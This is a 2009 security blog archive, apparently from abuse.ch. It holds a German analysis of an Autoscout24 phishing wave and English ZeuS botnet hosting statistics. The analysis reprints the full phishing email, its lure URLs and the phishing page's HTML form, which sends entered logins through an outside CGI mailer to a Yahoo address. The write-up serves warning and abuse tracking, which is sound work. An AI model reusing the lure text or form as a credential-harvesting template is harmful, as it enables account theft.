Monthly Archive for February, 2009

Phishing Attacke gegen Autoscout24

Seite heute Morgen kurz nach 06:00 Uhr scheint eine gezielte phishing Attacke gegen autoscout24 im Gange zu sein. Das Phishing-Mail täuscht vor, vom Absender info@autoscout24.ch zu stammen. Der Absender ist in Wahrheit jedoch gefälscht:

Von: info@autoscout24.ch
Betreff: Verkaeufer Informationen Haben Erfordert

Aufmerksamkeit!

Liebes Mitglied Autoscout24,

Wir haben kurzlich bemerkt, dass eine oder mehr Versuche in zu Ihrem autoscout24 Konto von einem auslandischen IP Adresse loggen..

Wenn Sie kurzlich auf Ihr Konto zugegriffen haben, wahrend Reisen, durfte der ungewohnliche Klotz in Versuchen von Ihnen eingeleitet worden sein. Jedoch, wenn Sie den Klotz in nicht eingeleitet haben, bitte Besuch autoscout24 sobald moglich, Ihre Identitat zu beglaubigen:

http://autoscout24-reg.info/home/index/login.asp/verify.html

Beglaubigt, dass Ihre Identitat ein Sicherheitsma©¬ ist, das sichern wird, dass Sie die einzige Person mit Zugriff auf das Konto sind.

Dank fur Ihre Geduld, als wir zusammenarbeiten, Ihr Konto zu schutzen.

Fur mehr Informationen sieht bitte den Verbindungsblasebalg:

http://about.autoscout24.com/de-de/au-company/au-company-agb/au-company-agb-as24.aspx

Mit freundlichen Grussen,

AutoScout24 Team,
AutoScout24 GmbH
Rosenheimer Str. 143 b
81671 Munchen

Das Phishing-Mail ist in schlechtem deutsch verfasst und versucht den Empfänger auf eine Phishing-Seite zu locken:

autoscout24_phishing

Die Phishing Webseite autoscout24-reg.info (83.170.121.1) wird bei einem Provider in Grossbritannien gehostet:

inetnum: 83.170.120.0 – 83.170.123.255
netname: UK2-NET
descr: UK2.net
remarks: Abuse matters to: abuse@uk2.net
remarks: Abuse mail to any other address may be ignored
country: GB

Gibt das Opfer seine Autoscout24 Login Informationen ein, werde diese an den Urheber der Phishing-Mails gesendet. Interessant ist in diesem Fall der HTML-Quellcode der Phishing-Webseite, dort findet man nämlich die E-Mail Adresse, an welche die gephishten Login Informationen gehen:

<\FORM style="MARGIN: 0px" name=SignInForm
onsubmit=setOptimCookie();readFlash();
action=http://www.step-sa.fr/cgi-bin/mailform.cgi method=post
?><\INPUT type=hidden value=username,password,email,email_p
name=data_order> <\INPUT type=hidden
value=fameia_bionica@yahoo.com name=submit_to> <\INPUT type=hidden
value=http://magazin.autoscout24.de/container/container-2/cookies_ab_ie6.asp
name=ok_url>

Mit einem Klick auf den Button “Anmelden” werden die angegebenen Login-Daten über ein CGI-Script auf www.step-sa.fr per E-Mail an eine Yahoo E-Mail Adresse gesandt:

fameia_bionica@yahoo.com

Fazit
Den Empfänger solcher Phishing-Mails wird dringen davon abgeraten, auf den im Phishing-Mail angegebenen Link zu klicken sowie auf keinen Fall seine Login-Daten bekannt zu geben.

UPDATE 19. März 2009

Seit heute Morgen ist erneut eine Phishing-Welle gegen Autoscout24 am rollen. Absender, E-Mail Betreff und E-Mail Text sind die selben wie bei der letzte Phishing-Welle. Die angepriesene URL ist jedoch eine andere (autoscot24-ch.info):

http://autoscot24-ch.info/home/index/login.asp/verify.html

Die Webseite wird diesmal auf einem Server in den USA betrieben:

Domain: autoscot24-ch.info
IP address: 216.10.249.21

NetRange: 216.10.240.0 – 216.10.255.255
OrgName: Webhost4life.com
OrgID: UMA-9
Address: 1055 Corporate Center Drive Suite 210
City: Monterey Park
StateProv: CA
PostalCode: 91754
Country: US

Some ZeuS statistics

A week ago, I’ve published the abuse.ch ZeuS Tracker. Now I decided to post some statistical data about the ZeuS hosts.

First of all, let’s take a look at the worst ISPs, which are currently hosting ZeuS Command&Control servers:


ZeuS host count AS number AS name
17 44997 BTG route block
14 16265 LEASEWEB AS
13 44097 Sistemnet Telekomunikasyon
11 9800 CHINA UNICOM

It’s quit interessting to see AS44997 (BTG12-AS BTG route block) at the top of the worst ISPs. For those of you which are reading my blog frequently: You now that ASN very-well from my previous posts. For all others: AS44997 was formerly known as UATelecom. The ISP is now known as Ural Industrial Company (Ural-NET) and is located in Russia. Different name but the same dirty business as before:

zeus_uralindustries

Source: ZeuS Tracker :: AS44997

A part of Ural Industrial Company subnet is also listed on Spamhaus’s Don’t Route Or Peer (DROP) list:

91.211.64.0/22 ; SBL70438
Source: www.spamhaus.org/drop/drop.lasso

Ref: SBL70438
91.211.64.0/22 is listed on the Spamhaus Block List (SBL)
15-Feb-2009 21:53 GMT | SR04
Cybercrime & spam hosting hub; Ural Industrial Company
Source: Spamhaus SBL70438

Another suspicious ISP is Leasweb, which is located in the Netherlands. When we look at Spamhaus SBL, we see more supicious activities in Leasweb’s Network:

Found 8 SBL listings for IPs under the responsibility of leaseweb.com
See www.spamhaus.org/sbl/listings.lasso?isp=leaseweb.com

The next ISP is Sistemnet Telekomunikasyon which is located in Turkey. I’ve already seen a lot of phishing sites, C&Cs and dropzones there. Shortly, It’s even worst than Ural-NET. Just take a look onto the SBLs concerning Sistemnet Telekomunikasyon:

Found 50 SBL listings for IPs under the responsibility of sistemnet.com.tr
See www.spamhaus.org/sbl/listings.lasso?isp=sistemnet.com.tr

Wow, there are currently 50 SBL listings concerning that ISP! So just another dirty ISP…

Now let’s take a look into the top ten ZeuS hosting countries:


# of ZeuS hosts country
47 Russian Federation
41 United States
23 China
19 Netherlands
12 Ukraine
11 Turkey

Just without a comment.

If you want to see the whole statistic you can take a look on it on the ZeuS Tracker statistic page (link).

Improvements made to the ZeuS Tracker

Last but not least I have made some improvements to the ZeuS Tracker:

Country RSS feed available
I’ve received some requests from various CERTs concerning a country RSS Feed for new ZeuS hosts. So I’ve decided to create one. You can find it on the country page (eg. https://zeustracker.abuse.ch/monitor.php?country=HK). On the country page, just click on “Subscribe this country via RSS feed” and you will get informed about new ZeuS hosts in the specified country.

Browse ZeuS binaries
There is now a Browse ZeuS binaries function on the monitor page. With this function you can browse all ZeuS binaries which are stored in the ZeuS Tracker database (link).

Browse ZeuS configs
Additionally there is also a Browse ZeuS configs function on the monitor page. With this function you can browse all ZeuS configs which are stored in the ZeuS Tracker database (link).

Have fun!




economics-recluse
Scene
Urgent!